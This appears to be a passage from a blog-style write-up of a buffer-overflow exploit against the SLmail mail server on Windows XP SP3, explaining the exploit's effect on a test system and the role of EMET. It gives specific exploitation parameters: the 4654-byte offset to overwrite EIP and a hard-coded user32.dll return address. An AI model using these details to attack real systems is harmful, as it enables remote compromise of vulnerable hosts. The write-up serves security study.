DHCP Server: 192.168.34.254
IP address(es)
[01]: 192.168.34.134

C:\Program Files\SLmail\System>

The following screenshot is the exploit in acrion:

Image 1

Let’s go back of some steps and debug the exploit and look at image 2.

Image 2

The EIP is overwritten after 4654 bytes of space (\x41 ASCII A) and, in the 4 bytes of the EIP (\x42 ASCII B), I will put the return address ‘\x53\x93\x42\x7E’ that will point to exact space address of user32.dll. This will surelly work only under the same OS version (every Windows XP sp3 eng); that is where the user32.dll version and address space is the same.
If I understend how EMET works, it will often change the spece address of user32.dll de facto invalidating the exploit. Or better causing the application crash.

[end of phase 1] Take a look at the [phase 2]